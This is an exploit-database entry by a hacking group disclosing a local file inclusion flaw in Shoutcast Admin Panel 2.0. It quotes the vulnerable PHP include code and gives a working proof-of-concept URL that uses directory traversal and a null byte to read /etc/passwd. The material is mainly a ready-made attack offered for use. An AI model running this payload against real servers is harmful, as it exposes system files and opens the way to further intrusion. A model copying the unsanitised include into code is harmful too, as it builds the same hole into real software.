Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability

2008-06-14T00:00:00
ID 1337DAY-ID-3181
Type zdt
Reporter CWH Underground
Modified 2008-06-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability
===================================================================


  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 14 June 2008


#####################################################
 APPLICATION : WallCity-Server: Shoutcast Admin Panel
 VERSION     : 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/shoutcastadmin
#####################################################

---LFI---

-------------------------
 Vulnerable in index.php
-------------------------

@Line

    79: if (isset($_GET['page']))
    80:         $page = $_GET['page'];
    81: else
    82: 	$page = "main";
    .
    .
    .
   204:  <?PHP if(!include("pages/".$page.".php"))
   205:		{
   206:			table("Achtung!");
   207:			echo "Die Seite existiert nicht!"; 
   208:			closetable();
   209:		}
   210:	 ?>

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################



#  0day.today [2018-04-01]  #